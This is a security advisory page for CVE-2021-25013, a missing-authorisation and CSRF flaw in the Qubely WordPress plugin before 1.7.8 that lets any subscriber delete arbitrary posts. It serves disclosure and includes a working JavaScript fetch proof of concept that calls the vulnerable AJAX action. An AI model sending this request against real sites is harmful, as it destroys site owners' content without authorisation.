Qubely < 1.7.8 – Subscriber+ Arbitrary Post Deletion | CVE 2021-25013 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF check on the qubely_delete_saved_block AJAX action, and does not ensure that the block to be deleted belong to the plugin, as a result, any authenticated users, such as subscriber can delete arbitrary posts

Note: v1.7.7 added capability check, CSRF check were added in 1.7.8

Proof of Concept

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=qubely_delete_saved_block&block_id=1",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

Fixed in 1.7.8

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

e88b7a70-ee71-439f-b3c6-0300adb980b0

Timeline

Publicly Published

2021-12-27 (about 2 years ago)

Added

2021-12-27 (about 2 years ago)

Last Updated

2022-04-09 (about 2 years ago)

Other

Published

Title

Published

2024-04-05

Title

JS Help Desk – Best Help Desk & Support Plugin < 2.8.4 - Missing Authorization

Published

2024-02-26

Title

Categorify < 1.0.7.5 - Missing Authorization in categorifyAjaxRenameCategory

Published

2022-03-14

Title

Amelia < 1.0.48 - Customer+ SMS Service Abuse and Sensitive Data Disclosure

Published

2023-09-18

Title

Super Store Finder < 6.9.4 - Unauthenticated Email Creation/Sending

Published

2024-04-29

Title

Academy LMS < 1.9.17 - Missing Authorization